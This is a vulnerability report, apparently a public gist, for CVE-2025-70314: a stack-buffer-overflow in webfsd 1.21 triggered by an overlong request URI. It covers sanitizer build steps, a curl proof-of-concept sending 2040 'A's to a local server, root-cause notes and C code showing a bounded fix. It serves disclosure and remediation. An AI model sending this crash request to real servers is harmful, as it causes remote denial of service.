@Err0rzz
Created February 9, 2026 03:04
Reference for CVE-2025-70314

Vulnerability Report

Project

Summary

webfsd can be crashed remotely by an unauthenticated client via a specially crafted very long HTTP request URI. When compiled with AddressSanitizer/UndefinedBehaviorSanitizer, the server reports an out-of-bounds index and an ASan stack-buffer-overflow involving the stack variable filename, then aborts.

Affected Version(s)

  • Confirmed
    • VERSION: 1.21
    • git rev-parse HEAD: c51981b8b57d62c83c15045f84731cc839be4f1a
    • git describe --tags --always: 1.21-12-gc51981b

Impact

  • Remote unauthenticated Denial of Service (DoS) via process abort/crash.

Reproduction Environment

  • Linux (recommended): Debian bullseye or compatible — ASan/UBSan support is most reliable on Linux.
  • macOS: May work; if linking fails with undefined sanitizer symbols, add LDFLAGS='-fsanitize=address,undefined'.
  • clang build with: -O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined and defines -DMIMEFILE and -DWEBFS_VERSION.
  • Server listens on port 8000, docroot /tmp/docroot.

Real-World Attack Scenario

In practice, an attacker only sends a malicious HTTP request. The attacker has no filesystem access and does not create any directories on the server. The overflow occurs during request parsing when the server constructs the path. The steps below use a minimal setup; the long-path directory is optional and may help trigger the vulnerable code path in some configurations.

Steps to Reproduce

1. Clone webfsd and check out the affected version

git clone https://github.com/ourway/webfsd.git && cd webfsd
git checkout c51981b8b57d62c83c15045f84731cc839be4f1a

2. Build with ASan/UBSan

Use single quotes around CFLAGS so the shell does not strip the escaped quotes from the macro string literals. Add LDFLAGS so the sanitizer runtime is linked.

Linux:

make clean && make CC=clang \
  CFLAGS='-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined -DMIMEFILE=\"/etc/mime.types\" -DWEBFS_VERSION=\"1.21\"' \
  LDFLAGS='-fsanitize=address,undefined'

macOS:

make clean && make CC=clang \
  CFLAGS='-O1 -g -fno-omit-frame-pointer -fsanitize=address,undefined -DMIMEFILE=\"/usr/share/cups/mime/mime.types\" -DWEBFS_VERSION=\"1.21\"' \
  LDFLAGS='-fsanitize=address,undefined'

3. Create docroot (and optionally a long-path directory to ensure the vulnerable code path is reached)

mkdir -p /tmp/docroot

4. Start the server

./webfsd -F -p 8000 -r /tmp/docroot

5. Send long-path request (in another terminal; attacker needs no filesystem access)

curl -v "http://127.0.0.1:8000/$(python3 -c "print('A'*2040)")/"

6. Observe the server crashes and outputs an ASan/UBSan report on stderr.

Evidence

Figure 1 — UBSan/ASan report: stack-buffer-overflow in filename (request.c:353) [image: poc1]

Figure 2 — Process abort and empty reply from server [image: poc1_abort]

Root Cause (high level)

During request parsing / filename construction, a fixed-size stack buffer (filename) is accessed without enforcing a strict upper bound for very long request URIs, resulting in out-of-bounds access and a stack-buffer-overflow.

Suggested Fix

  • Enforce a strict maximum length for request URI/path early and reject overlong requests.
  • Avoid unbounded concatenation/copy into stack buffers; use snprintf (or equivalent) and check return values.
  • Add explicit bounds checks in code paths constructing/using filename.
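The following is an added illustration of the bounded-construction approach recommended above. It is not webfsd's code: the limits MAX_URI_LEN and FILENAME_SIZE, the "<docroot>/<uri>" layout and the function names build_filename and handle_request are assumptions made for this example. It shows the three suggested measures together: an early length check on the URI, snprintf into a fixed-size buffer with its return value checked, and a stack buffer that is only ever written through that bounded builder.

```c
#include <stdio.h>
#include <string.h>

/* Assumed limits for this illustration (not webfsd's own constants). */
#define MAX_URI_LEN   1024   /* longest request path we are willing to serve */
#define FILENAME_SIZE 2048   /* size of the fixed stack buffer the path goes into */

/*
 * Bounded construction of "<docroot>/<uri>" into a caller-supplied buffer.
 * Returns 0 on success, -1 if the URI exceeds MAX_URI_LEN (rejected before
 * any copying), -2 if the combined path would not fit in out (snprintf
 * reported truncation). Never writes past out[outsz - 1].
 */
int build_filename(char *out, size_t outsz, const char *docroot, const char *uri)
{
    if (out == NULL || outsz == 0 || docroot == NULL || uri == NULL)
        return -1;

    /* Early rejection of overlong requests: the first suggested fix. */
    if (strlen(uri) > MAX_URI_LEN)
        return -1;

    /* snprintf cannot overflow out, but it tells us the length it wanted;
     * a value >= outsz means the path was truncated and must be refused. */
    int n = snprintf(out, outsz, "%s/%s", docroot, uri);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';  /* leave no partial path behind for later code */
        return -2;
    }
    return 0;
}

/*
 * Models the request-handling step: a fixed-size array on the stack that is
 * filled only through build_filename. Returns the builder's status and, on
 * success, stores the resulting path length in *len_out.
 */
int handle_request(const char *docroot, const char *uri, size_t *len_out)
{
    char filename[FILENAME_SIZE];
    int rc = build_filename(filename, sizeof filename, docroot, uri);
    if (len_out)
        *len_out = (rc == 0) ? strlen(filename) : 0;
    return rc;
}

int main(void)
{
    char buf[64];

    /* Constructed sample: an ordinary request path succeeds. */
    printf("short: %d\n", build_filename(buf, sizeof buf, "/tmp/docroot", "index.html"));

    /* Constructed sample: 2040 'A's, the length used in the report, is
     * rejected by the URI length check before anything is copied. */
    char longuri[2041];
    memset(longuri, 'A', 2040);
    longuri[2040] = '\0';
    printf("long: %d\n", build_filename(buf, sizeof buf, "/tmp/docroot", longuri));
    return 0;
}
```

The two return codes are kept distinct on purpose: -1 is a policy rejection (the request is too long to be legitimate) and can be answered with a 414 status, while -2 means the path passed the URI check yet still did not fit the destination buffer, which is the case the snprintf return-value check exists to catch.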